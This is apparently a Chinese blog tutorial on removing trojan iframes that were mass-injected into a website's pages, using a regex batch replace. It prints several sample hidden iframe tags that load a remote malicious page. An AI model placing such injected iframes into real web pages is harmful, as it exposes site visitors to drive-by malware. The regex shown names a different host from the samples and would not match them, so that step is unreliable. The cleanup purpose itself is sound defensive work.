網站被批量掛馬是經常遇到的事情，一般用批量替換工具很方便就可以批量刪除相關代碼，但是如果一個網站里面每個頁面都被放置了木馬，而且代碼還都不一樣。這種情況如何處理？

下面我們一起來學習一下批量使用替換工具刪除相關木馬：

因為沒有一個頁面掛的馬是相同的，所以根本刪不掉。前幾天我的一個朋友就遇到了這個問題。他訴苦道服務器上一個網站被批量掛了木馬，仔細一看居然每個頁面掛的木馬都不一樣。

我檢查了一下是類似這樣的情況：

頁面一的木馬是：

<ifraME src=http://www.hack6.com/isme.asp widTH=50 height=0 name=5148 naMe=2 boRdeR=0></ifRame>

頁面二的木馬是：

<ifraME src=http://www.hack6.com/isme.asp widTH=50 height=0 name=2133 naMe=2 boRdeR=0></ifRame>

頁面三的木馬是：

<ifraME src=http://www.hack6.com/isme.asp widTH=50 height=0 name=4583 naMe=2 boRdeR=0></ifRame>

……

仔細看，雖然每個頁面上掛的木馬不同，但是還是有一定規律的。

這時候，我就在郁悶了，要是能有一個支持正則的批量替換工具就好了。還好補天的areone幫忙，給我介紹了一個小工具，恰恰可以滿足這個要求。

打開AFR工具，選擇批量替換：

搜索內容部分填寫：

<ifraME src=http://88lai.3322.org/u.asp widTH=50 height=0 name=\d{4} naMe=2 boRdeR=0></ifRame>

替換為空 即可。

注意上面語句中紅色部分，就是正則表達式了。通過這種方法，就可以批量對木馬進行刪除了。

很快，清除了4百多個頁面上的木馬。大功告成。

正則表達式在平時技術方面的應用中用的很多，后面我也會給大家找一些這方面的教材。